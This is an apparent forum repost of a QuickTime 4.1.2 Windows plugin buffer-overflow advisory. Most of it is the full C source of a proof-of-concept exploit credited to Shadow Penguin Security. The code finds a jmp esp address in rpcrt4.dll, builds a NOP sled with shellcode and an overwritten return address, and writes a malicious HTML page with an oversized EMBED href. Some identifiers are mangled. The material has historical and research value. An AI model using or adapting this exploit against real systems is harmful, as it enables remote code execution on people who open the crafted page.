Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability

[DarkLegion]

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.

/*====================================================================

Apple QuickTime 4.1.2 plug-in exploit

The Shadow Penguin Security (http://shadowpenguin.backsection.net)

Written by UNYUN (shadowpenguin@backsection.net)

====================================================================

*/

#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#define MOV_FILE "c:\\program files\\quicktime\\sample.mov"

#define HEIGHT 60

#define WIDTH 60

#define TARGET "QUICKTIMEPLAYER"

#define FILE_IMAGE \

"<html><embed src=\"%s\" href=\"%s\" "\

"width=%d height=%d autoplay=\"true\" "\

"target=\"%s\"><br></html>"

#define BUFSIZE 730

#define RET 684

#define ESP_TGT "rpcrt4.dll"

#define JMPESP_1 0xff

#define JMPESP_2 0xe4

#define NOP 0x90

unsigned char exploit_code[200]={

0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,

0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,

0xFF,0xD0,0x00,

};

main(int argc,char *argv[])

{

FILE *fp;

char buf[bUFSIZE];

unsigned int i,pretadr,p,ip,kp;

MEMORY_BASIC_INFORMATION meminfo;

if (argc<2){

printf("usage : %s Output_HTML-fileName [sample .mov file]\n",

argv[0]);

exit(1);

}

if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){

printf("%s is not found.\n",ESP_TGT);

exit(1);

}

VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));

pretadr=0;

for (i=0;i<meminfo.RegionSize;i++){

p=kp+i;

if ( ( p &0xff)==0

|| ((p>>8 )&0xff)==0

|| ((p>>16)&0xff)==0

|| ((p>>24)&0xff)==0) continue;

if ( *((unsigned char *)p)==JMPESP_1

&& *(((unsigned char *)p)+1)==JMPESP_2)

pretadr=p;

}

if ((fp=fopen(argv[1],"wb"))==NULL){

printf("File write error \"%s\"\n",argv[1]);

exit(1);

}

memset(buf,NOP,BUFSIZE);

memcpy(buf+700-12,exploit_code,strlen(exploit_code));

buf[bUFSIZE-2]=0;

ip=pretadr;

printf("EIP=%x\n",ip);

buf[RET ]=ip&0xff;

buf[RET+1]=(ip>>8)&0xff;

buf[RET+2]=(ip>>16)&0xff;

buf[RET+3]=(ip>>24)&0xff;

if (argc==2)

fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);

else

fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);

fclose(fp);

printf("Done.\n");

}

-----

UNYUN

% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]

shadowpenguin@backsection.net (SPS-Official)

unyun@shadowpenguin.org (Personal)

% eEye Digital Security Team [ Vulnerability Management - Assessment - Endpoint Protection - IT Security Software | eEye Digital Security ]

unyun@eEye.com

sursa